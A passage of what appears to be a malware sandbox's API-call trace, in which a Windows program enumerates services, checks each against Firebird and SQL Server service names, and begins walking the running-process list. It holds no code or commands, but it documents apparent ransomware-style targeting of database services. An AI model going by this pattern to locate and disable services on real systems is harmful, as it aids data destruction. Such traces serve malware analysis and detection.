lpServices=0x4137f20, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4137f20, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0297.544] CloseServiceHandle (hSCObject=0x401a0f8) returned 1 [0297.544] lstrlenW (lpString="AppXSvc") returned 7 [0297.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0297.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0297.544] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0297.544] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0297.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0297.544] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0297.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0297.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0297.544] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0297.544] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0297.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0297.544] lstrlenW (lpString="Audiosrv") returned 8 [0297.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0297.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0297.545] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0297.545] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0297.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0297.545] lstrlenW (lpString="BFE") returned 3 [0297.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0297.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0297.545] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0297.545] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0297.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0297.545] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0297.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0297.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0297.545] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0297.545] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0297.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0297.545] lstrlenW (lpString="CDPSvc") returned 6 [0297.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0297.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0297.545] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0297.545] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0297.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0297.545] lstrlenW (lpString="ClickToRunSvc") returned 13 [0297.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0297.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0297.545] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0297.546] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0297.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0297.546] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0297.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0297.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0297.546] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0297.546] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0297.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0297.546] lstrlenW (lpString="CryptSvc") returned 8 [0297.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0297.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0297.546] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0297.546] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0297.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0297.546] lstrlenW (lpString="DcomLaunch") returned 10 [0297.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0297.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0297.546] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0297.546] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0297.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0297.547] lstrlenW (lpString="DeviceAssociationService") returned 24 [0297.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0297.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0297.547] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0297.547] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0297.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0297.547] lstrlenW (lpString="Dhcp") returned 4 [0297.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0297.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0297.547] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0297.547] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0297.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0297.547] lstrlenW (lpString="Dnscache") returned 8 [0297.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0297.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0297.547] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0297.547] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0297.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0297.547] lstrlenW (lpString="DPS") returned 3 [0297.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0297.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0297.547] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0297.547] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0297.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0297.547] lstrlenW (lpString="DusmSvc") returned 7 [0297.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0297.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0297.548] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0297.548] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0297.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0297.548] lstrlenW (lpString="EventLog") returned 8 [0297.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0297.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0297.548] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0297.548] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0297.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0297.548] lstrlenW (lpString="EventSystem") returned 11 [0297.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0297.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0297.548] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0297.548] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0297.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0297.548] lstrlenW (lpString="FontCache") returned 9 [0297.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0297.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0297.548] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0297.548] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0297.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0297.548] lstrlenW (lpString="gpsvc") returned 5 [0297.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0297.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0297.548] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0297.548] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0297.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0297.549] lstrlenW (lpString="iphlpsvc") returned 8 [0297.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0297.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0297.549] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0297.549] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0297.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0297.549] lstrlenW (lpString="KeyIso") returned 6 [0297.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0297.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0297.549] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0297.549] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0297.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0297.549] lstrlenW (lpString="LanmanServer") returned 12 [0297.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0297.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0297.549] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0297.549] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0297.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0297.549] lstrlenW (lpString="LanmanWorkstation") returned 17 [0297.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0297.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0297.549] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0297.549] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0297.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0297.550] lstrlenW (lpString="lfsvc") returned 5 [0297.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0297.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0297.550] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0297.550] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0297.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0297.550] lstrlenW (lpString="lmhosts") returned 7 [0297.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0297.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0297.550] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0297.550] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0297.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0297.550] lstrlenW (lpString="LSM") returned 3 [0297.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0297.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0297.550] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0297.550] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0297.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0297.550] lstrlenW (lpString="MpsSvc") returned 6 [0297.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0297.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0297.551] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0297.551] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0297.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0297.551] lstrlenW (lpString="NcbService") returned 10 [0297.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0297.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0297.551] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0297.551] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0297.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0297.551] lstrlenW (lpString="netprofm") returned 8 [0297.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0297.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0297.551] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0297.551] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0297.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0297.551] lstrlenW (lpString="NgcSvc") returned 6 [0297.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0297.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0297.551] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0297.552] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0297.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0297.552] lstrlenW (lpString="NlaSvc") returned 6 [0297.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0297.552] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0297.552] lstrlenW (lpString="nsi") returned 3 [0297.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0297.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0297.552] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0297.552] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0297.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0297.552] lstrlenW (lpString="PcaSvc") returned 6 [0297.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0297.552] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0297.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0297.552] lstrlenW (lpString="PlugPlay") returned 8 [0297.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0297.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0297.552] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0297.552] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0297.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0297.553] lstrlenW (lpString="Power") returned 5 [0297.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0297.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0297.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0297.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0297.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0297.553] lstrlenW (lpString="ProfSvc") returned 7 [0297.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0297.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0297.553] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0297.553] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0297.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0297.553] lstrlenW (lpString="RpcEptMapper") returned 12 [0297.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0297.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0297.553] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0297.553] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0297.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0297.553] lstrlenW (lpString="RpcSs") returned 5 [0297.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0297.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0297.553] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0297.553] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0297.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0297.553] lstrlenW (lpString="SamSs") returned 5 [0297.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0297.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0297.554] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0297.554] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0297.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0297.554] lstrlenW (lpString="Schedule") returned 8 [0297.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0297.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0297.554] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0297.554] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0297.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0297.554] lstrlenW (lpString="SecurityHealthService") returned 21 [0297.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0297.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0297.554] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0297.554] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0297.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0297.554] lstrlenW (lpString="SENS") returned 4 [0297.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0297.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0297.554] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0297.554] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0297.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0297.554] lstrlenW (lpString="ShellHWDetection") returned 16 [0297.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0297.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0297.555] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0297.784] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0297.784] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0297.784] lstrlenW (lpString="Spooler") returned 7 [0297.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0297.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0297.805] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0297.806] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0297.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0297.806] lstrlenW (lpString="StateRepository") returned 15 [0297.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0297.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0297.806] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0297.806] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0297.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0297.806] lstrlenW (lpString="SysMain") returned 7 [0297.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0297.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0297.806] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0297.806] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0297.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0297.806] lstrlenW (lpString="SystemEventsBroker") returned 18 [0297.806] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0297.806] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0297.806] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0297.806] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0297.806] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0297.806] lstrlenW (lpString="Themes") returned 6 [0297.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0297.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0297.807] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0297.807] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0297.807] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0297.807] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0297.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0297.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0297.807] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0297.807] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0297.807] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0297.807] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0297.807] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0297.807] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0297.807] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0297.807] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0297.807] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0297.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c0 [0297.821] Process32FirstW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.821] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.823] lstrlenW (lpString="System") returned 6 [0297.823] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.824] lstrlenW (lpString="smss.exe") returned 8 [0297.824] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.824] lstrlenW (lpString="csrss.exe") returned 9 [0297.825] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.825] lstrlenW (lpString="wininit.exe") returned 11 [0297.825] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.826] lstrlenW (lpString="csrss.exe") returned 9 [0297.826] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: 